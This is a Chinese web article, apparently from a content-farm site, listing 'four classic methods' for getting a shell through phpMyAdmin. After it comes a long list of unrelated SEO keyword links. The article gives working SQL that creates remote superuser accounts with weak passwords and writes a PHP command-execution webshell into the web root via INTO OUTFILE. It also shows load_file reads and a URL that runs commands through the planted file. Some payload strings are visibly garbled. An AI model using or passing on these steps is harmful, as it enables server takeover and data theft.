PHPmyadmin拿shell的方法有哪些
发表于:2024-09-24 作者:千家信息网编辑
千家信息网最后更新 2024年09月24日,这篇文章将为大家详细讲解有关PHPmyadmin拿shell的方法有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。PHPmyadmin修改用户密码直接点击上面的
千家信息网最后更新 2024年09月24日PHPmyadmin拿shell的方法有哪些
这篇文章将为大家详细讲解有关PHPmyadmin拿shell的方法有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
PHPmyadmin修改用户密码
直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可
添加超级用户guetsec密码ooxx并且允许外连
GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;
我们可以创建root账户设置密码
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
这样就创建了root外联账户,密码123456,外链时用123456
拿shell四种经典方法:
方法一:
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );INSERT INTO `mysql`.`study` (`7on` )VALUES ('');SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php 一句话连接密码:7on
方法二:
读取文件内容: select load_file('E:/xamp/www/s.php');写一句话: select ''INTO OUTFILE 'E:/xamp/www/study.php'cmd执行权限: select '\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
方法三:
JhackJ版本 PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL);Insert INTO study (cmd) VALUES('');select cmd from study into outfile 'E:/wamp/www/7.php'; Drop TABLE IF EXISTS study; -------------------------------------------------------------------------------- CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。INSERT INTO study( cmd ) VALUES ('');# 影响列数: 1SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
方法四:
select load_file('E:/xamp/www/study.php');select '\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
Phpmyadmin导出一句话时出现(Errcode: 13 - Permission denied)
是对此目录没有权限,可以试试上级目录,或者下级目录
再不行试试NTS引流
还有就是注意目录\
关于"PHPmyadmin拿shell的方法有哪些"这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
方法
密码
目录
一句话
用户
篇文章
内容
更多
权限
结果
账户
影响
查询
不行
不错
实用
上级
下级
同时
外联
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
网络安全工程师学的人多吗
软件开发需要硬盘多大
公益网络安全视频
软件开发 公司 起名
信息网络安全所有简答题
亿家安互联网科技直播间
数据库技术考试
小兔数据库2.0
御剑情缘有几个服务器
软件开发高薪职业
心得体会计算机网络技术基础
hbase数据库删除记录命令
卖云服务器选用什么配置好
联盛软件开发员面试
女娲网络技术有限公司
商洛软件开发联系方式
js数据库更新数据库数据库
前程无忧技术数据库
网络安全工程师是个坑
腾讯网络安全巡查员怎么样
临沂分销软件开发哪家做的好
东莞网络安全教育作业
网络安全月讨论
数据库2016标准版
互联网科技运营
服务器电源价格
sql存储多个数据库
网络安全画画好看的 百度网盘
软件开发有免费学习的吗
广西电网驻场软件开发做什么